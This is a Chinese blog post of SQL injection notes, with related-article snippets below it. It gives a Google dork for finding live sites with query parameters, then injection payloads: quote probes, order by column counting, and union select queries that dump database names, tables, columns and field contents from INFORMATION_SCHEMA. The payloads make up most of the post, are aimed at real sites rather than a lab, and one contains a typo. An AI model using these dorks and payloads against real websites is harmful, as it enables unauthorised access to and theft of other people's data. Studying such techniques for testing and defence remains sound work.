sql注入简单流程(会继续更新)

最新推荐文章于 2024-04-24 15:25:55 发布
最新推荐文章于 2024-04-24 15:25:55 发布
阅读量418 收藏
点赞数 1
分类专栏: 笔记 文章标签: sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/105700003
版权

简单的介绍一下流程

思想:有SQL的网站肯定是与数据库有交互,即用户输入的参数可以进入网站后台数据库查询
一.搜索寻找可能存在漏洞的网站
inurl:.php?id=(or)inurl:.asp?id=
注:这里用到了googlehacking 查询 不了解可以百度一下或者看看上一篇文章关于Googlehacking
https://blog.csdn.net/qq_46091464/article/details/105254770

二.进行手工注入测试

’ %23
’ )%23
’ and 1=2%23
" and 1=2%23

三.进行发现字段
order by

四.进行union查询

union select user(),database(),version(),...%23

注:查询的内容必须与字段数保存一致
即:字段数如果是5 查询的内容必须的5个内容

五.判断数据库版本
即默认数据库5.0以上的满足
Information_SCHEMA()(all库名)
TABLE_NAME (all表名)
COLUMN_NAME(all列名)

六.进行暴破数据库

' union select 1,1,1,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES#

' union select 1,1,1,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES# (where table_schema=database())

' union select 1,1,1,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.columns#   (where table_name=XXX)(可能用16进制绕过0x....)

最后:暴破字段

' union select 1,1,1,字段 from 表名#

特别提醒:在暴破数据库的时候前面的参数需要改变一下(如果?id=1 )需要将id=1改变成一个不存在的数字(就是数据库里面没有这个数字)
如:id=-1 或者在id=1后面添加and 1=2,让前面错误,这样才可以满足字段数。

七.遇到了字段数特别少怎么一次性查询?
用concat()函数

union select concat(database(),' ',version()) TABLE_SCHEMA from INFORMATION_SCHEMA.TALES#

下一篇 将会深入了解sqlmap工具的使用 和不同版本数据库的SQL注入
或者是 操作实战 SQL注入。
如果文章有错误希望朋友们指出_!
喜欢你们喜欢~(大佬绕过 小白不喜勿喷)

Firebasky
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sql注入流程
weixin_45837672的博客
07-20 2605
Sql注入本质是把用户输入都数据当做代码来执行,最终达到欺骗服务器执行恶意的SQL命令。
分析SQL手工注入一般步骤
三朝看客
07-18 1929
首先,判断环境,寻找注入点,判断数据库类型,我们在前面的课程讲过。 其次,根据注入参数类型,在脑海中重构SQL语句的原貌. 按参数类型主要分为下面三种: (1) ID=131 这类注入的参数是数字型,SQL语句原貌大致如下: Select * from 表名 where 字段=131 注入的参数为ID=49 And [查询条件],即是生成语句: Select * from 表名 where 字段...
【数据库测试】SQL注入测试——一般步骤方法
最新发布
u013177528的博客
04-24 552
SQL注入是一种常见的网络攻击手段,攻击者通过在Web应用程序的输入字段中注入恶意SQL代码,来利用不安全的数据库查询。SQL注入测试的目的是验证应用程序是否能够抵御这类攻击。SQL注入测试是Web应用安全测试的重要组成部分,它有助于确保应用程序的安全性和数据的完整性。记录测试过程中发现的所有问题,并与开发团队合作修复这些漏洞。
sql注入基础原理及注入方式
A906003660的博客
07-20 1124
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
简单sql手工注入过程
weixin_52242569的博客
09-25 2848
sql手工注入过程判断注入点判断注入类型判断注入点提交方式使用order by 查询字段使用联合查询来查询当前数据库、用户、版本信息查询当前数据库中的表,列和值 判断注入点 1.单引号法:直接在网址后面加一个单引号,如果页面不能正常显示,浏览器返回一些异常信息,则说明该链接可能存在sql注入漏洞 2.1=1和1=2:在网址后面的get传参中加上 and 1=1 ,显示正常,把1=1替换为1=2,显示异常,说明网页存在sql注入。 判断注入类型 1.数字型注入:注入变量的值不需要用引号引起来,如 select
SQL注入的详细过程
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-21 1292
SQL注入详细过程:SQL注入的详细过程第一步:SQL注入点探测。探测SQL注入点是关键的第一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。通常只要带有输入提交的动态网页,并且动态网页访问数据库,就可能存在SQL注入漏洞。如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户输入未进行有效验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞。 SQL注入的详细过程第二步:收集后台数据库信息。不同数据库的注入方法、函数都不尽相同,因此在
ASP做个用户注册.pdf
10-14
这表明代码采用了简单的防护措施来防止SQL注入攻击。当请求的查询字符串包含这些关键词时,系统将阻止请求并给出错误提示。 - `chkform`函数未在提供的内容中显示,但通常它在表单提交前对用户输入进行验证,例如...
WODECMS开源内容管理系统 v1.1.zip
07-06
1 修复XSS和SQL注入漏洞; 2 优化config表冗余字段,增加微信支付和微信公众号配置; 3 隐藏缺失的商城模块后台菜单 4 增加了微信菜单管理和更新功能 5 优化了插件安装流程 6 修复的后台上传附件没权限的提示 7 ...
asp.net知识库
06-18
最详细的SQL注入相关的命令整理 Oracle Oracle中PL/SQL单行函数和组函数详解 mssql+oracle Oracle编程的编码规范及命名规则 Oracle数据库字典介绍 0RACLE的字段类型 事务 CMT DEMO(容器管理事务演示) 事务隔离性的...
go编程1
08-03
- 避免SQL注入:使用预编译语句或参数化查询。 - 存储密码:使用哈希和加盐技术安全存储用户密码。 - 加密和解密数据:了解加密算法,如AES、RSA,并使用Go的crypto包。 10. 国际化和本地化 - 设置默认地区:...
JAVA上百实例源码以及开源项目源代码
12-11
Calendar万年历 1个目标文件 EJB 模拟银行ATM流程及操作源代码 6个目标文件,EJB来模拟银行ATM机的流程及操作:获取系统属性,初始化JNDI,取得Home对象的引用,创建EJB对象,并将当前的计数器初始化,调用每一个...
SQL注入之如何检测与判断详细过程
01-31
SQL注入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf 5、sqlmapApi的使用 以前注入点满大街,一个单引号就可以判断出是否存在注入点。但是如今随着各大厂商越来越注重安全,各种过滤,各种waf,将注入隐藏的越来越深。那么作为白帽子,该如何判断是否存在注入! 这里附上我挖bat各大厂商时用的判断注入方法。下一期再分享如何过waf。
SQL注入(四)手工注入攻击步骤
热门推荐
pumpkin9
05-05 4万+
以bugkuctf平台的一道题为例:链接http://120.24.86.145:8002/chengjidan/ 0)首先测试正常数据。 链接的结尾添加【?id=1(数字任意)】 1) 判断是否存在注入点; 【?id=32(数字任意)】链接的结尾依次添加语句【‘】、【and 1=1】和【and 1=2】,来判断网站是否存在注入点。尝试在正常数据后加上单引号,发现数据为空,加...
血腥!实况转播SQL注入全过程,让你知道危害有多大。
weixin_30532973的博客
03-31 947
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就实况转播,来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公司名的输入框,根...
SQL注入流程
xiaomengxin70的博客
04-03 1442
第一步:判断是否有注入点 sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" 第二步:获取数据库 sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs 第三步:查看但前应用程序所用数据库 sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db 第四步:列出指定数据的所有的表 sqlm.
SQL注入步骤
weixin_44689834的博客
05-16 505
SQL注入的过程 最近学习了SQL注入,抽空总结一下 1.寻找注入点 找到类似的id=类似的可以手工测试是否为注入点一般的测试手工手段就是 id=1 and 1=2 等等根据返回的页面判断是什么类型的注入方式 一般没有加’‘就是数字型注入 加了’‘就是字符型注入 根据不同的注入类型来选择不同的注入方式 2.判断字段个数 id=1 order by n 3. 判断数据库信息 这个一般是根据页面的报错显示数据库的类型等等 4.查找数据库名 ?id=1 and 1=2 uni
sql中“delete from 表名”表示_SQL注入——数据库增删改查语句
weixin_39939904的博客
11-16 6663
我们之前有讲过数据库是用来存储数据的,那么我们要如何才能从里面去查询到一些数据呢?如何才能把这些数据存储进去呢?那这就需要用到我们sql语句了。我们需要用这些语法去操作数据库。Sql,是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据和查询,更新还有管理数据库,它分为三类:1、 DDL数据定义语言 create,drop2、 DML数据库操作语言 select insert u...
sql注入原理详解(一)
lindalan的专栏
08-26 4742
一、什么是sql注入呢?         所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库时,发生sql注入攻击。如果代码使用存储过程,
SQL注入Update注入
weixin_43765321的博客
03-03 5431
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
防御sql注入流程
04-21
防御SQL注入流程图如下: 1. 输入验证:对用户输入的数据,确保输入的数据符合预期的格式和类型。 2. 参数化查询:使用参数化查询或预编译语句来构建SQL查询语句,而不是直接拼接用户输入的数据。 3. 使用ORM...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值